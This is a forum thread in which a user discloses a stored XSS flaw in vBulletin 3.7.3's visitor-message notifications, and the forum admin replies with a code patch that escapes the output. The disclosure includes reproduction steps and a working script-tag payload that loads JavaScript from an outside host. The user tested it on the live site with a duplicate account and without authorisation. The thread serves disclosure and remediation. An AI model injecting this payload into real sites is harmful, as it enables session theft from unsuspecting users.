vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix

Discussion in 'Ethical hacking Tips' started by SaswatPadhi, Jun 8, 2009.

  1. SaswatPadhi

    SaswatPadhi ~ Б0ЯИ Τ0 С0δЭ ~

    Joined:
    May 5, 2009
    Messages:
    1,342
    Likes Received:
    55
    Trophy Points:
    0
    Occupation:
    STUDENT !
    Location:
    Orissa, INDIA
    Home Page:
    http://www.crackingforfun.blogspot.com

    NOTICE



    THIS XSS/XSRF VULNERABILITY WAS FOUND BY ME.

    @ admin (shabbir)

    Please don't ban me for this. Because I have not used this hack for any illegal / harmful purposes. (You can check all records). I have just tested an exploited and found it positive. Please fix it soon. I write this article so as to bring this thing to your eyes first, before anyone else knows about it and takes advantage.

    Please do NOT reject this article and please approve it. Please don't remove this NOTICE section.


    Action ;)



    First, we must check the version of vBulletin used by G4EF :
    (1) Open any page such as your user control panel.
    (2) View the page-source.
    (3) You discover this :
    Code:
    <style type="text/css" id="vbulletin_css">
    /**
    * vBulletin 3.7.3 CSS
    * Style: 'Default Style'; Style ID: 1
    */
    @import url("clientscript/vbulletin_css/style-eb31dabe-00001.css");
    </style>
    (4) Perfect ! G4EF is not upgraded to latest 3.8.x vBulletin. So, we can hack it. :)

    The vulnerability :
    When vBulletin is used with "Visitor Messages" add-on, we can easily execute external code by XSS vulnerability that exists. When the XSS script is posted as visitor message, the data is run through htmlentities(); before being displayed to the general public/forum members. However, when posting a new message, a new notification is sent to the commentee (the one who receives). And when the commentee visits usercp.php (User Control Panel), under the domain he is hit with an unfiltered xss attach !

    How I tested it :
    (1) I opened a duplicate account : _H4X0R_, which I request shabbir to kindly delete now.
    (2) I posted some test visitor messages. The most interesting (and working) one was <SCRIPT SRC=http://ha.ckers.org/xss.js>
    (3) I logged out.
    (4) I logged in as _H4X0R_.
    (5) Opened my user control panel : usercp.php.
    (6) Whoa !! XSS successful !


    Conclusion



    Please don't use this knowledge for illegal/harmful purposes. This was written only for educational purposes.

    I think I deserve some good reputation points and/or some rewards for this !

    Sorry shabbir, for using duplicate account but you may delete it now. You should also understand that this was important for the security of the forum and so please don't ban me :p
     
  2. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    Thanks for reporting Saswat and Upgrading to 3.7.6 is the preferred solution which we would also be doing it but here is the quick fix. Using vBulletin 3.7.3 and having all the functionality and plugins tested I preferred not to upgrade immediately ( Though I have the upgrade option ) and here is the patch for this Vulnerability.

    Open usercp.php file
    Go to Line Number 250
    Find the following Code
    Code:
    $visitormessage['summary'] = fetch_word_wrapped_string(fetch_censored_text(fetch_trimmed_title(strip_bbcode($visitormessage['pagetext'], true, true), 50)));
    
    Replace with
    Code:
    $visitormessage['summary'] = htmlspecialchars_uni(fetch_word_wrapped_string(fetch_censored_text(fetch_trimmed_title(strip_bbcode($visitormessage['pagetext'], true, true), 50))));
    
    And that should be fine for this problem.

    vBulletin also recommendeds to upgrade to latest version which has all the fixes.
     
  3. SaswatPadhi

    SaswatPadhi ~ Б0ЯИ Τ0 С0δЭ ~

    Joined:
    May 5, 2009
    Messages:
    1,342
    Likes Received:
    55
    Trophy Points:
    0
    Occupation:
    STUDENT !
    Location:
    Orissa, INDIA
    Home Page:
    http://www.crackingforfun.blogspot.com
    Glad to know that it's fixed. :)
     
  4. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    ncie find. I really like XSS vulnerabilities. not 100% sure but i think its already reported to miliw0rm couple of months back.
     
    Last edited: Jun 10, 2009
  5. SaswatPadhi

    SaswatPadhi ~ Б0ЯИ Τ0 С0δЭ ~

    Joined:
    May 5, 2009
    Messages:
    1,342
    Likes Received:
    55
    Trophy Points:
    0
    Occupation:
    STUDENT !
    Location:
    Orissa, INDIA
    Home Page:
    http://www.crackingforfun.blogspot.com
    What's miliw0rm ?
     
  6. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    checkout miliw0rm.com , all the vulnerabilities which are found by different hackers and penetration testers are released under that program. Just search for "vbulletin" and you will see lots of them. This site plays a major role to help the developers of different CMSes to release a new version of their software after fixing the vulnerabilities.
     
  7. SaswatPadhi

    SaswatPadhi ~ Б0ЯИ Τ0 С0δЭ ~

    Joined:
    May 5, 2009
    Messages:
    1,342
    Likes Received:
    55
    Trophy Points:
    0
    Occupation:
    STUDENT !
    Location:
    Orissa, INDIA
    Home Page:
    http://www.crackingforfun.blogspot.com
    Yeah, I got it. But it's not miliw0rm.com, it's milw0rm.com.
    Lots of vulnerabilities and a md5 cracker too : perfect package for hackers.
     
  8. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    yea sorry for that speling mistake.
     
  9. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    Yes it was found on many other websites as well but no one had the Patch unless you upgrade the complete code and so here I provided the patch as well. Enjoy
     
  10. harshit

    harshit New Member

    Joined:
    May 30, 2009
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    great piece of information
     
  11. mayjune

    mayjune New Member

    Joined:
    Jun 14, 2009
    Messages:
    814
    Likes Received:
    33
    Trophy Points:
    0
    Occupation:
    Student
    Location:
    Pune,Delhi
    can you explain what is XSS ? i searched, i am still not getting it.....
     
  12. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
  13. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
  14. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice